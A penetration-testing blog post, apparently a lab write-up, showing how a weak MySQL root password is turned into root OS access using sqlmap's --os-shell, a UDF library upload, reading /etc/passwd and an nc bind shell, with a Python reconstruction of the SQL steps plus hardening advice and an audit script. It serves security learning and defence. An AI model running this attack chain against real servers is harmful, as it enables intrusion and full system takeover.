Penetration Learning Notes -- scenario -- getting a shell from the MySQL root account

Source: Internet
Author: User
Tags: file permissions, kali, linux

Scenario description:
This scenario comes from a network penetration test the week before, where I found a MySQL database with a weak password.
The username and password were root and root respectively; this is the DBA account in MySQL.
Its privileges are in fact very broad. The MySQL root user holds the FILE privilege, so it can write files on the server, and MySQL 5.0 and later can load user-defined functions (UDFs) from a shared library; an attacker uses that to add a function that runs operating-system commands, which then serves as the shell interface.
When I ran into this weak password I was thinking about how to take over the host quickly through the MySQL root account, and whether there was a faster way than doing it by hand. Naturally I thought of sqlmap. After reading its documentation on GitHub I found the options described below.
Let's walk through the scenario together!


Environment:
Two machines. One is Kali Linux, acting as the MySQL server, with the SSH and MySQL services running; its IP address is 192.168.80.128.

The other is Ubuntu, acting as the attack host, with Nmap and sqlmap installed; its IP address is 192.168.80.129.


1. First we scan the common ports with Nmap.
The command is: nmap -A -n -T3 192.168.80.128
The scan results were as follows (screenshot):


2. The second step, finding the weak MySQL password with a brute-force tool, is skipped here.
3. Now the main content: how to use the MySQL root account and password once we have them.
1) First, look at the sqlmap documentation on GitHub (linked in the original post).


We can see that there is a "-d" option, and the usage section gives an example of it.
The full syntax is: "DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME" or "DBMS://DATABASE_FILEPATH".
[1] DBMS: the type of database; here it is mysql.
[2] USER: the database user; here root.
[3] PASSWORD: that user's password; on my server it is 3erver.
[4] DBMS_IP: the IP address of the database server; here 192.168.80.128.
[5] DBMS_PORT: the port the database server listens on; it cannot be omitted. For MySQL the default is 3306.
[6] DATABASE_NAME: the database to connect to. MySQL traditionally ships with a test database (releases from 5.7 on no longer create it), so I use test here; if there is no test database, create one with CREATE DATABASE test;
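To make the -d syntax concrete, here is a small parser for that connection string. It is an example added to these notes, not sqlmap's own code: it accepts both documented forms, keeps a password that itself contains ':' or '@', and rejects a string without a port, as the documentation requires. The two DBMS name sets are illustrative assumptions, not sqlmap's full list of supported engines.

```python
import re

# Example added to these notes; not sqlmap's parser. It mirrors the two
# forms documented for sqlmap's -d option:
#   DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME   (network DBMS)
#   DBMS://DATABASE_FILEPATH                               (file-based DBMS)
# The DBMS names below are an illustrative assumption, not sqlmap's list.
NETWORK_DBMS = {"mysql", "postgresql", "mssql", "oracle"}
FILE_DBMS = {"sqlite", "access", "firebird"}

# The password is matched greedily so it may itself contain ':' or '@';
# the engine backtracks to the last '@' that is followed by HOST[:PORT]/DB.
_NETWORK_RE = re.compile(
    r"^(?P<dbms>[A-Za-z]+)://(?P<user>[^:@/]+):(?P<password>.*)@"
    r"(?P<host>[^:@/]+)(?::(?P<port>\d+))?/(?P<db>[^/]+)$"
)
_FILE_RE = re.compile(r"^(?P<dbms>[A-Za-z]+)://(?P<path>[^@]+)$")


def parse_direct(target):
    """Split a -d connection string into its parts, or raise ValueError."""
    m = _NETWORK_RE.match(target)
    if m:
        dbms = m.group("dbms").lower()
        if dbms not in NETWORK_DBMS:
            raise ValueError("unknown network DBMS: %s" % dbms)
        if m.group("port") is None:
            # The port is mandatory in the documented syntax; for MySQL write 3306.
            raise ValueError("port missing (MySQL default is 3306)")
        return {
            "dbms": dbms,
            "user": m.group("user"),
            "password": m.group("password"),
            "host": m.group("host"),
            "port": int(m.group("port")),
            "database": m.group("db"),
        }
    m = _FILE_RE.match(target)
    if m:
        dbms = m.group("dbms").lower()
        if dbms not in FILE_DBMS:
            raise ValueError("%s needs USER:PASSWORD@HOST:PORT/DB" % dbms)
        return {"dbms": dbms, "path": m.group("path")}
    raise ValueError("not a DBMS://... connection string")


def is_valid_direct(target):
    """True if parse_direct accepts the string."""
    try:
        parse_direct(target)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The target used in these notes: user root, password 3erver, database test.
    print(parse_direct("mysql://root:3erver@192.168.80.128:3306/test"))
```

The file form is only allowed for file-based engines, so a MySQL string that merely forgot its port is reported as an error rather than silently read as a path.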
2) Let's try it. On the server I first run the MySQL daemon as root to see what happens. Which OS user the daemon runs as is set in the configuration file /etc/mysql/my.cnf, so I change the user entry under the [mysqld] section to root, like this (screenshot):


Looking at the process list, we can see that mysqld was started with the --user=root option (screenshot):

3) Now I connect to the MySQL server on Kali using sqlmap's -d option:
sqlmap -d "mysql://root:3erver@192.168.80.128:3306/test" -f


The -f option performs an extensive fingerprint and prints the MySQL server version, as shown (screenshot):

Next we replace -f with the --os-shell option (screenshot):

sqlmap then asks for the architecture of the server. If you do not know, guess: there are only two choices, 32-bit or 64-bit (screenshot):

I chose 64-bit. sqlmap then uploads the matching shared library (its bundled lib_mysqludf_sys UDF) to the server; that library provides the sys_exec and sys_eval functions, through which we can run system commands (screenshot):

When we enter the whoami command, sqlmap asks whether we want to retrieve the command output. We answer "a" here, meaning always return the output. You can see that the privileges match those of the OS user running the MySQL server, so we now have root. From here we can read /etc/passwd, spawn an nc shell, add users, and so on.
ifconfig output (screenshot):


Viewing the /etc/passwd file (screenshot):

nc shell
(1) Through the os-shell, start nc on the MySQL server listening on port 2333 (screenshot). Because the listener runs on the target and we connect to it, this is strictly a bind shell rather than a reverse ("bounce") shell; a firewall that blocks inbound connections to the target would stop it.


(2) Check the IP of our attack host; it is indeed 192.168.80.129.
Then run ncat 192.168.80.128 2333 to connect to the shell (screenshot):


(3) With that, we have walked through how to quickly turn a MySQL root account into system privileges.
4. What are the limitations?
(1) As mentioned, the OS user running MySQL had to be root, because the whole process works like this:
[1] sqlmap connects to the remote database with the root account and password.
[2] sqlmap uploads the 32-bit or 64-bit shared library for the platform from its udf folder into the server's plugin directory, /usr/lib/mysql/plugin/. The file is written by mysqld itself (SELECT ... INTO DUMPFILE), so it is created as the OS user mysqld runs as.
[3] sqlmap registers the function exported by the uploaded library with CREATE FUNCTION and calls it to run the command you typed.
(2) The library has to land in /usr/lib/mysql/plugin/, and on this server only root can write to that directory. In other words, if mysqld runs as a non-root user (the default mysql account on Debian-based systems such as Kali), the write fails and this route to system commands is closed. Newer MySQL releases (5.7 and later) also default secure_file_priv to a restricted directory or NULL, which blocks INTO DUMPFILE writes outside it regardless of the OS user.
(3) On Windows the MySQL root account can generally run more system commands, because setting up a non-administrator service account takes extra work, so some administrators run MySQL under an Administrator account; in that case we obtain the same level of access.
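What --os-shell did in step 3 is, at the SQL level, a short sequence of statements. The block below is an example added to these notes that reconstructs that sequence from the documented lib_mysqludf_sys technique; it is not sqlmap's source, and it does not connect to anything. It only builds the statements so you can read them or run them yourself with a mysql client. The plugin path and library name are the ones reported on this page; LIBRARY_BYTES is a constructed placeholder standing in for the real shared library.

```python
import binascii

# Example added to these notes, not sqlmap's code: the SQL an --os-shell run
# issues against MySQL once it has a connection with the FILE privilege.
PLUGIN_DIR = "/usr/lib/mysql/plugin"        # plugin_dir of the Kali server in this note
UDF_FILENAME = "lib_mysqludf_sys.so"        # the MySQL UDF library sqlmap bundles
LIBRARY_BYTES = b"\x7fELF" + b"\x00" * 12   # constructed placeholder, NOT a real library


def upload_sql(library, plugin_dir=PLUGIN_DIR, filename=UDF_FILENAME):
    """Step 1: write the library into plugin_dir. A hex literal sidesteps any
    quoting problem in the binary, and INTO DUMPFILE (unlike INTO OUTFILE)
    writes the bytes verbatim with no escaping or trailing newline. The file
    is created by the mysqld OS user, which is why that user must be able to
    write to plugin_dir (on this page, mysqld had to run as root)."""
    hex_blob = binascii.hexlify(library).decode("ascii")
    return "SELECT 0x%s INTO DUMPFILE '%s/%s'" % (hex_blob, plugin_dir, filename)


def create_functions_sql(filename=UDF_FILENAME):
    """Step 2: register the two functions lib_mysqludf_sys exports."""
    return [
        "CREATE FUNCTION sys_exec RETURNS INTEGER SONAME '%s'" % filename,
        "CREATE FUNCTION sys_eval RETURNS STRING SONAME '%s'" % filename,
    ]


def _quote(text):
    # Minimal MySQL string-literal escaping for the default sql_mode.
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def exec_sql(command, want_output=True):
    """Step 3: run an OS command. sys_eval returns the command's output (what
    you get after answering 'a' at the prompt); sys_exec returns only the
    exit status."""
    func = "sys_eval" if want_output else "sys_exec"
    return "SELECT %s(%s)" % (func, _quote(command))


def cleanup_sql():
    """Step 4: what sqlmap's --cleanup removes afterwards. The .so itself
    stays on disk unless it is deleted through sys_exec."""
    return ["DROP FUNCTION sys_eval", "DROP FUNCTION sys_exec"]


def full_sequence(command, library=LIBRARY_BYTES):
    """All statements in order, e.g. for review or a mysql -e batch."""
    return [upload_sql(library)] + create_functions_sql() + [exec_sql(command)] + cleanup_sql()


if __name__ == "__main__":
    for stmt in full_sequence("whoami"):
        print(stmt + ";")
```

Reading the sequence makes the limitation in the next section obvious: step 1 succeeds only if the mysqld OS user may create files in plugin_dir and secure_file_priv does not forbid the write; nothing else in the chain needs root.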


5. Defence
(1) Least privilege on Linux: do not make the MySQL plugin directory writable by the mysqld user, and if it must be writable, restrict which users have that permission. To find the plugin directory, log in to the database and run
SELECT @@plugin_dir;
For example, the plugin_dir I got on a Windows install (screenshot):


(2) Best practice is to allow root to connect only from localhost, and to grant remotely accessible database accounts only the privileges they need (SELECT, INSERT, UPDATE, DELETE); never grant them the FILE privilege.
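The limitations in section 4 and the defences in section 5 are the same list seen from two sides, so here is one audit that checks them all. It is an example added to these notes, not part of the original post: you feed it the OS user mysqld runs as (ps -o user= -C mysqld), the values of plugin_dir and secure_file_priv (SHOW VARIABLES WHERE Variable_name IN ('plugin_dir', 'secure_file_priv')), and the rows of SELECT user, host, File_priv FROM mysql.user, and it reports each precondition the attack above needs. The sample inputs are constructed to resemble this page's Kali server after mysqld was switched to root; the severities and the 65534 "nobody" uid in the demo are assumptions.

```python
import os
import stat
import tempfile

# Example added to these notes (not from the original post): an audit of the
# conditions the UDF attack needs, which are also the controls the defence
# section asks for. Inputs mirror plain MySQL query output; nothing here
# connects to a database. Runs on POSIX (uses file mode bits and os.getuid).
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def dir_writable_by(path, uid, gid):
    """Can a process with this uid/gid create files in `path`? Uses only the
    mode bits (ACLs are ignored); uid 0 is treated as always able."""
    if uid == 0:
        return True
    st = os.stat(path)
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid == gid and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit(mysqld_os_user, variables, user_rows, plugin_dir_writable):
    """Return a list of (severity, finding); an empty list means nothing to report."""
    findings = []
    plugin_dir = variables.get("plugin_dir", "")
    if mysqld_os_user == "root":
        findings.append(("high", "mysqld runs as root: any UDF it loads executes as root"))
    if plugin_dir_writable:
        findings.append(("high", "plugin_dir %s is writable by the mysqld OS user, so a UDF "
                                 "library can be dropped there with INTO DUMPFILE" % plugin_dir))
    sfp = variables.get("secure_file_priv")
    if sfp == "":
        # Empty string = no restriction; NULL (shown as 'NULL') = file I/O disabled.
        findings.append(("medium", "secure_file_priv is empty: INTO OUTFILE/DUMPFILE may write "
                                   "anywhere mysqld can; set it to a directory or NULL"))
    elif sfp not in (None, "NULL") and plugin_dir.startswith(sfp):
        findings.append(("medium", "secure_file_priv %s covers plugin_dir" % sfp))
    for row in user_rows:
        user, host, file_priv = row["user"], row["host"], row["File_priv"]
        remote = host not in LOCAL_HOSTS
        if user == "root" and remote:
            findings.append(("high", "root@%s: root account reachable remotely" % host))
        if file_priv == "Y" and remote:
            findings.append(("high", "%s@%s: remote account holds FILE privilege" % (user, host)))
    return findings


# Constructed sample resembling the Kali server of this note, not real output.
SAMPLE_VARIABLES = {"plugin_dir": "/usr/lib/mysql/plugin/", "secure_file_priv": ""}
SAMPLE_USERS = [
    {"user": "root", "host": "localhost", "File_priv": "Y"},
    {"user": "root", "host": "%", "File_priv": "Y"},          # the weak remote root
    {"user": "app", "host": "192.168.80.%", "File_priv": "N"},
]


def sample_audit():
    return audit("root", SAMPLE_VARIABLES, SAMPLE_USERS, plugin_dir_writable=True)


def demo_plugin_dir_check():
    """Make a throw-away directory with mode 0755 and show that its owner can
    write to it while an unprivileged uid (65534, assumed 'nobody') cannot."""
    path = tempfile.mkdtemp()
    os.chmod(path, 0o755)
    try:
        return (dir_writable_by(path, os.getuid(), os.getgid()),
                dir_writable_by(path, 65534, 65534))
    finally:
        os.rmdir(path)


if __name__ == "__main__":
    for severity, finding in sample_audit():
        print("[%s] %s" % (severity, finding))
    print("owner/nobody can write to a 0755 dir:", demo_plugin_dir_check())
```

The first finding is the one this page hinges on: once mysqld runs as root, dir_writable_by is trivially true for every directory, so fixing the service account is worth more than tightening the mode bits on plugin_dir.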


6. This article is written in scenario form: first the scenario, then the tools and how to use them.



This article is from the "line and enjoy" blog; please keep this source: http://skytina.blog.51cto.com/6834539/1722403
